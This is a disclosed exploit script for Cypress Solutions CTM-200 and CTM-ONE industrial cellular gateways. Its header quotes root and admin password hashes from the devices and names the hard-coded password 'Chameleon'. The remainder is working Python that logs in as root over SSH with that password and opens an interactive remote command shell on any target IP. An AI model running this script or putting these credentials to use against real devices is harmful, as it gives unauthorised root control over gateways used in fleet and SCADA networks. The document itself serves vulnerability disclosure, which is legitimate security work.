Cypress Solutions CTM-200/CTM-ONE Hard-Coded Credentials Remote Root

`#!/usr/bin/env python3  
#  
#  
# Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH)  
#  
#  
# Vendor: Cypress Solutions Inc.  
# Product web page: https://www.cypress.bc.ca  
# Affected version: CTM-ONE (1.3.6-latest)  
# CTM-ONE (1.3.1)  
# CTM-ONE (1.1.9)  
# CTM200 (2.7.1.5659-latest)  
# CTM200 (2.0.5.3356-184)  
#  
# Summary: CTM-200 is the industrial cellular wireless gateway for fixed  
# and mobile applications. The CTM-200 is a Linux based platform powered  
# by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard  
# features make the CTM-200 ideal for mobile fleet applications or fixed  
# site office and SCADA communications.  
#  
# CTM-ONE is the industrial LTE cellular wireless gateway for mobile and  
# fixed applications. CTM-ONE is your next generation of gateway for fleet  
# tracking and fixed sites.  
#  
# ======================================================================  
# CTM-200  
# /var/config/passwd:  
# -------------------  
# root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash  
# admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash  
# nobody:*:65534:65534:nobody:/var:/bin/false  
# daemon:*:65534:65534:daemon:/var:/bin/false  
#  
# /var/config/advanced.ini:  
# -------------------------  
# 0  
# 0  
# Chameleon  
# 0,0,0,0,0,255  
# 0,0,0,0,0,255  
# 0,0,0,0,0,255  
# 0,0,0,0,0,255  
# 0,0,0,0,0,255  
# 0,0,0,0,0,255  
#  
#  
# CTM-ONE  
# /etc/shadow:  
# ------------  
# admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::  
# root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::  
# daemon:*:16009:0:99999:7:::  
# bin:*:16009:0:99999:7:::  
# sys:*:16009:0:99999:7:::  
# ftp:*:16009:0:99999:7:::  
# nobody:*:16009:0:99999:7:::  
# messagebus:!:16009:0:99999:7:::  
# ======================================================================  
#   
# Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials  
# within their Linux distribution image. This weakness can lead to the  
# exposure of resources or functionality to unintended actors, providing  
# attackers with sensitive information including executing arbitrary code.  
#  
# Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l)  
# GNU/Linux 2.6.32.25 (arm4tl)  
# lighttpd/1.4.39  
# BusyBox v1.24.1  
# BusyBox v1.15.3  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2021-5686  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php  
#  
#  
# 21.09.2021  
#  
  
import sys  
import paramiko  
  
bnr='''  
o ┌─┐┌┬┐┌─┐ ┌─┐ ┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬ ┬ o  
│ │││││ ┬ ├─┤ ├┬┘│ ││ │ │ └─┐├─┤├┤ │ │  
o └─┘┴ ┴└─┘ ┴ ┴ ┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o  
'''  
print(bnr)  
  
if len(sys.argv)<2:  
print('Put an IP.')  
sys.exit()  
  
adrs=sys.argv[1]##  
unme='root'#admin#  
pwrd='Chameleon'##  
  
rsh=paramiko.SSHClient()  
rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy())  
rsh.connect(adrs,username=unme,password=pwrd)  
  
while 1:  
cmnd=input('# ')  
if cmnd=='exit':  
break  
stdin,stdout,stderr=rsh.exec_command(cmnd)  
stdin.close()  
print(str(stdout.read().decode()))  
rsh.close()  
`